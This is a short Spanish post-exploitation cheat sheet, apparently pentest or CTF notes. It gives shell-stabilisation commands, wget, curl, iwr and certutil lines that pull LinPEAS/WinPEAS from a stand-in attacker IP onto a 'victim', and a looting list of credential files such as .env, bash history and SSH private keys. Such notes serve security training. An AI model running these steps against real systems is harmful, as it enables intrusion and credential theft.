Skip to content

👑 Post-Explotación

Ya estás dentro. ¿Ahora qué?

1. Estabilizar la Shell

No pierdas tu acceso por un Ctrl+C.

bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

2. Escalada de Privilegios

El siguiente paso lógico es conseguir el control total.

3. Transferencia de Archivos

Cómo mover herramientas (LinPEAS, exploits) a la máquina víctima.

Desde tu máquina (Atacante)

Levanta un servidor web:

bash
python3 -m http.server 80

En la víctima (Descarga)

  • Linux (wget/curl):
    bash
    wget http://<TU_IP>/linpeas.sh
    curl http://<TU_IP>/linpeas.sh -o linpeas.sh
  • Windows (PowerShell/Certutil):
    powershell
    iwr -uri http://<TU_IP>/winpeas.exe -OutFile winpeas.exe
    cmd
    certutil -urlcache -split -f http://<TU_IP>/winpeas.exe winpeas.exe

4. Looting (Saqueo)

Antes de irte, busca información sensible.

  • Archivos de Configuración: wp-config.php, config.php, .env.
  • Historial: .bash_history, ConsoleHost_history.txt.
  • Llaves SSH: ~/.ssh/id_rsa.
  • Credenciales de BD: Cadenas de conexión en scripts.

5. Pivoting

Saltar a otras máquinas de la red interna.

  • Chisel
  • Ligolo-ng

Sin copyright ni nada. Ház lo que quieras con todo esto.